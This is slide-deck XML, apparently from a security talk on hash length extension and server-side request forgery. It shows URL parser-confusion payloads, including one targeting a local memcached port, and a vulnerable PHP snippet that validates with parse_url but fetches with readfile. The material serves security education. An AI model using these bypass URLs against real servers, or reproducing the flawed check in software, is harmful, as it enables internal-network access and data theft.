                <a:spcPts val="3500"/>
              </a:lnSpc>
              <a:defRPr sz="1360">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="3500"/>
              </a:lnSpc>
              <a:defRPr sz="1360">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="3500"/>
              </a:lnSpc>
              <a:defRPr sz="1360">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0030  00 00 00 00 00 00 00 00 50 00 00 00 00 00 00 00  ........P.......</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="3500"/>
              </a:lnSpc>
              <a:defRPr sz="1360">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3500">
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                </a:uFill>
                <a:hlinkClick r:id="rId2" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Length_extension_attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3500">
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                </a:uFill>
                <a:hlinkClick r:id="rId3" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://github.com/iagox86/hash_extender</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:defRPr sz="2500">
                <a:solidFill>
                  <a:srgbClr val="85FF6E"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Special thanks to ron at skull security.org</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="3500"/>
              </a:lnSpc>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>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erver Side Request Forgery…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="81025" y="141086"/>
            <a:ext cx="12842749" cy="4289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Server Side Request Forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>It’s more complicated than you may think…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr b="1" sz="3800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>facebook.com</a:t>
            </a:r>
            <a:r>
              <a:t> &amp;@</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFE28E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>google.com</a:t>
            </a:r>
            <a:r>
              <a:t> #@</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>instagram.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFil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erver Side Request Forgery…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="81025" y="160136"/>
            <a:ext cx="12842749" cy="9433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Server Side Request Forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>It’s more complicated than you may think…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr b="1" sz="3800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>facebook.com</a:t>
            </a:r>
            <a:r>
              <a:t> &amp;@</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFE28E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>google.com</a:t>
            </a:r>
            <a:r>
              <a:t> #@</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>instagram.com</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="CF79E0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr b="1" sz="3800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="CF79E0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3800">
                <a:solidFill>
                  <a:srgbClr val="939898"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Python Says …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr b="1" sz="3800">
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Urllib2, httplib: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C2CACA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>facebook.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr b="1" sz="3800">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFE28E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requests:</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                </a:uFill>
                <a:hlinkClick r:id="rId2" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>google.com</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="CF79E0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr b="1" sz="3800">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Urllib: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C2CACA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>instagram.com</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="CF79E0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr b="1" sz="3800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="CF79E0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr b="1" sz="3800">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>RFC 3986 Spec:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85FF6E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:t>example.com:8080</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/path</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?foo=bar</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#frag</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="CF79E0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3800">
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85FF6E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scheme</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C2CACA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:t>authority</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C2CACA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
              </a:rPr>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C2CACA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C2CACA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fragment</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF767A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>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he Problem…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="149263" y="-43064"/>
            <a:ext cx="12706274" cy="78839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The Problem </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>RFC defines a spec, but not an implementation…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5500">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>http://127.0.0.1:</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFE28E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>11211</a:t>
            </a:r>
            <a:r>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="FFE28E"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>PHP readfile, Perl LWP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>PHP parse_url, Perl URI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>By using separate parsers for checking and fetching, most SSRF checks are inadequate…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Abusing PHP URL Parser…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-660884" y="37188"/>
            <a:ext cx="11811968" cy="8294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Abusing PHP URL Parser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:p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E44CE2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="DB8530"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  1 </a:t>
            </a:r>
            <a:r>
              <a:t>&lt;?php</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41C4D1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="DB8530"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  2 $</a:t>
            </a:r>
            <a:r>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="DB8530"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>parse_url</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E44CE2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="DB8530"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:t>_GET</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E44CE2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="D6492E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'url'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E44CE2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>])</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</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D6492E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="DB8530"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  3 if</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E44CE2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="DB8530"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="41C4D1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E44CE2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:t>'port'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E44CE2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="DB8530"/>
                </a:solidFill>
              </a:rPr>
              <a:t>===</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="DB8530"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="DB8530"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="41C4D1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E44CE2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:t>'host'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E44CE2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="DB8530"/>
                </a:solidFill>
              </a:rPr>
              <a:t>===</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>"google.com"</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E44CE2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="B300B3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{</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effectLst/>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="DB8530"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  4 </a:t>
            </a:r>
            <a:r>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="41C4D1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>readfile</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E44CE2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="DB8530"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="41C4D1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_GET</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E44CE2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="D6492E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'url'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E44CE2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>])</a:t>
            </a:r>
            <a:r>
              <a:t>;</a:t>
            </a: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rPr sz="2500">
                <a:solidFill>
                  <a:srgbClr val="DB8530"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  5 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2500">
                <a:solidFill>
                  <a:srgbClr val="B300B3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2500"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:t>     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="6400">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="6400">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="6400">
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFil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Abusing PHP URL Parser…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
